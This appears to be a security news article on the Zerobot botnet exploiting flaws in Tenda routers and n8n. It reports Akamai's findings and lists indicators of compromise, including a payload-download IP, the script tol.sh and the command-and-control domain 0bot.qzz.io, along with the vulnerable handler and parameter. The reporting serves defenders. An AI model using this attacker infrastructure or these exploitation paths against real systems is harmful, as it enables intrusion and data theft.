The Zerobot Botnet Mutates to Hijack Tenda Routers and n8n Automation Hubs

The malicious Zerobot network has commenced the aggressive exploitation of vulnerabilities inherent in Tenda routers and the n8n automation platform. The Akamai intelligence vanguard unearthed this campaign in January 2026, having intercepted a barrage of assaults within their proprietary honeypot architecture. These incidents represent the inaugural corroborated instances wherein these specific flaws have been weaponized following their initial disclosure in the latter half of 2025.

Architected upon the foundational framework of Mirai, Zerobot zeroes in on vulnerabilities designated as CVE-2025-7544 and CVE-2025-68613. The former critically afflicts Tenda AC1206 routers operating on firmware iteration 15.03.06.23. A pernicious buffer overflow error nestled within the setMacFilterCfg handler grants an assailant the power to execute arbitrary code remotely via the deviceList parameter. The swift emergence of a publicly accessible exploit proof-of-concept shortly after the vulnerability’s unmasking profoundly expedited the malefactors’ endeavors.

The latter vulnerability is inextricably linked to the expression evaluation engine within n8n. Versions spanning 0.211.0 through 1.20.4, alongside iterations 1.21.1 and 1.22.0, inadvertently permit the execution of arbitrary commands upon the host server—a catastrophic oversight stemming from inadequate isolation protocols during workflow expression processing. Alarmingly, an account utterly bereft of administrative privileges suffices to exploit this flaw. Penetrating through this fissure, an interloper may peruse and manipulate files, siphon environment variables replete with API keys, and subsequently entrench themselves deeply within the besieged infrastructure. Given that n8n is frequently harnessed to weave together disparate internal services and cloud-based platforms, such a compromise precipitates a profound peril of lateral traversal throughout the broader network.

Analysts at Akamai cataloged concerted efforts to retrieve a script dubbed tol.sh originating from the IP address 144.172.100.228. This script systematically downloads and executes zerobotv9 payloads tailored for a myriad of system architectures. The malicious module is ensconced within a UPX packer, harbors cryptographically obfuscated strings, and establishes communion with its command-and-control domain, 0bot.qzz.io. Embedded within its source code is the unmistakable initialization string characteristic of Mirai, accompanied by a curated repertoire of user-agents designed to masterfully camouflage its illicit traffic.

As delineated within the dossier, the architects of this campaign initiated their operations no later than December 2025, initially leveraging netcat and socat to fetch their payloads before pivoting toward curl and wget. Beyond the exploitation of nascent vulnerabilities, Zerobot ceaselessly scours the digital expanse for archaic, well-documented flaws—most notably CVE-2017-9841, CVE-2021-3129, and CVE-2022-22947. This stratagem perfectly encapsulates the quintessential modus operandi of modern botnets: the rapid and opportunistic weaponization of published vulnerability disclosures and prefabricated exploits, striking swiftly before system administrators can deploy the requisite defensive patches.

The moniker “Zerobot” originally surfaced within Fortinet’s intelligence briefings in 2022; however, any tether to its ancestral operators remains enshrouded in ambiguity. This ninth iteration diverges drastically from its primitive predecessors in both scale and foundational programming language, yet it steadfastly retains specific vestigial elements of Mirai, notably the cryptographic XOR key 0xDEADBEEF.

In response, Akamai has disseminated a comprehensive ledger of indicators of compromise, encompassing Snort and YARA defensive rules alongside a meticulous registry of implicated IP addresses and cryptographic hashes. The cybersecurity vanguard urgently implores organizations to audit their Tenda routers and n8n deployments, expeditiously apply all available prophylactic updates, and rigorously sequester these services from the perilous gaze of the external web.